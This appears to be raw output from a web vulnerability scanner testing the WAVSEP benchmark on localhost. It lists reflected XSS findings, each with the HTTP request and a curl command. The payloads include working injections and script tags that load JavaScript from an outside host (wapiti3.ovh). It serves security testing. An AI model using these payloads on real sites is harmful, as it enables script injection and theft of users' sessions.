GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp?userinput=%27%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wjfpduapn0%22%29%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp?userinput=%27%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wjfpduapn0%22%29%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp?userinput=%3E%3C%2Fscript%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3qqmi2lb3z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp?userinput=%3E%3C%2Fscript%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3qqmi2lb3z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwlzb002c8m%2C1%29%3B HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwlzb002c8m%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwxn8zfrqlq%2C1%29%3B HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwxn8zfrqlq%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwmje1rac3k%2C1%29%3B HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwmje1rac3k%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwq2crh02sj%2C1%29%3B HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwq2crh02sj%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwniobe2j6b%2C1%29%3B HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwniobe2j6b%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp?userinput=String.fromCharCode%280%2Cwyh1qh9iwd%2C1%29 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp?userinput=String.fromCharCode%280%2Cwyh1qh9iwd%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp?userinput=String.fromCharCode%280%2Cwd1dawtgfk%2C1%29 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp?userinput=String.fromCharCode%280%2Cwd1dawtgfk%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp?userinput=String.fromCharCode%280%2Cwawac3ts4w%2C1%29 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case24-Js2ScriptTag.jsp?userinput=String.fromCharCode%280%2Cwawac3ts4w%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp?userinput=String.fromCharCode%280%2Cwn1sqbq2f7%2C1%29 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp?userinput=String.fromCharCode%280%2Cwn1sqbq2f7%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp?userinput=String.fromCharCode%280%2Cwqqaxituqk%2C1%29 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case26-Vbs2ScriptTag.jsp?userinput=String.fromCharCode%280%2Cwqqaxituqk%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp?userinput=String.fromCharCode%280%2Cw6thtea3y0%2C1%29 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case27-Js2ScriptTagOLCommentScope.jsp?userinput=String.fromCharCode%280%2Cw6thtea3y0%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp?userinput=String.fromCharCode%280%2Cw5h1pvuv2h%2C1%29 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case28-Js2ScriptTagMLCommentScope.jsp?userinput=String.fromCharCode%280%2Cw5h1pvuv2h%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp?userinput=String.fromCharCode%280%2Cwh2wr3zvjm%2C1%29 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp?userinput=String.fromCharCode%280%2Cwh2wr3zvjm%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp?userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwero7umnkrz.js%3E%3C%2Fscript%3E&userinput2=1234 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp?userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwero7umnkrz.js%3E%3C%2Fscript%3E&userinput2=1234"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp

XSS vulnerability found via injection in the parameter userinput2
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp?userinput=1234&userinput2=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwofu8rfjfsz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp?userinput=1234&userinput2=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwofu8rfjfsz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp?userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwe05bh42j6z.js%3E%3C%2Fscript%3E&__VIEWSTATE=%2FwEPDwUENTM4MWRkhsjF%2B62gWnhYUcEyuRwTHxGDVzA%3D HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp?userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwe05bh42j6z.js%3E%3C%2Fscript%3E&__VIEWSTATE=%2FwEPDwUENTM4MWRkhsjF%2B62gWnhYUcEyuRwTHxGDVzA%3D"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp

XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp?userinput=%22%3E%3C%2Fscript%3E%3Cscript%20src%3D%2F%2Fwapiti3.ovh%2Fw5lwa7qa3kz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp?userinput=%22%3E%3C%2Fscript%3E%3Cscript%20src%3D%2F%2Fwapiti3.ovh%2Fw5lwa7qa3kz.js%3E%3C%2Fscript%3E" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp

XSS vulnerability found via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwj8g93to68z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwj8g93to68z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp

XSS vulnerability found via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2vxjkjn27z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2vxjkjn27z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwj8hub1vo6z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwj8hub1vo6z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwnjpvkkg1az.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwnjpvkkg1az.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp

XSS vulnerability found via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwmkihi0eqfz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwmkihi0eqfz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp

XSS vulnerability found via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwougl9ctlgz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwougl9ctlgz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp?transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb1v6aeaghz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp?transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb1v6aeaghz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp

XSS vulnerability found via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqhiivm3naz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqhiivm3naz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwicyaqslgcz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwicyaqslgcz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp

XSS vulnerability found via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwznybuw8qcz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwznybuw8qcz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp

XSS vulnerability found via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwuxv90jgcsz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwuxv90jgcsz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2a6jvrrp2z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case01-Redirect-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2a6jvrrp2z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
GET /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwhmjtiy1mqz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwhmjtiy1mqz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wbnjaw4fhl%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wbnjaw4fhl%27%29%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwm8a6tjn84z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwm8a6tjn84z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

XSS vulnerability found via injection in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%3Ealert%28%27wg22nthg3u%27%29%3C%2Fscript%3E
